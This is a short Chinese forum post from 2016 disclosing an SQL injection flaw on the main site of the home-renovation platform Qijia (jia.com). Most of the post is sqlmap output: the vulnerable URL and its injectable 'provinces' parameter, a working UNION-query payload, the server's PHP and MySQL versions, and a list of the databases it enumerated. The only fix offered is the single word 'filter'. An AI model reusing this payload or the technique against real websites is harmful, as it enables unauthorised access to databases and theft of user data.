齐家网主站 SQL 注入漏洞

pasckr 发表于 2016-5-12 17:54:42

齐家网主站SQL注入漏洞
注入点
http://p34.qhimg.com/t01de4d2512eb5d23f9.jpg?size=2560x1380
sqlmap identified the following injection point(s) with a total of 93 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: http://www.jia.com:80/citylist/ask_city_list.php?callback=jQuery172026691810227930546_1452738150949&provinces=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b7a71,0x4a6b736d6d6d727466786d5a667374504b5a624c52495056577a6a594b5a424b46545174554f4244,0x717a7a6a71),NULL,NULL,NULL-- -&_=1452738167755
web application technology: PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
available databases :
[*] _del_diaoding_20140702bak
[*] _del_query_20140702bak
[*] ConfigDB
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] xiuxiu
[*] zhuangxiu
[*] zxq
漏洞修补办法:过滤

页: [1]

Moke|墨客's Archiver

齐家网 主站 SQL 注入漏洞

齐家网主站 SQL 注入漏洞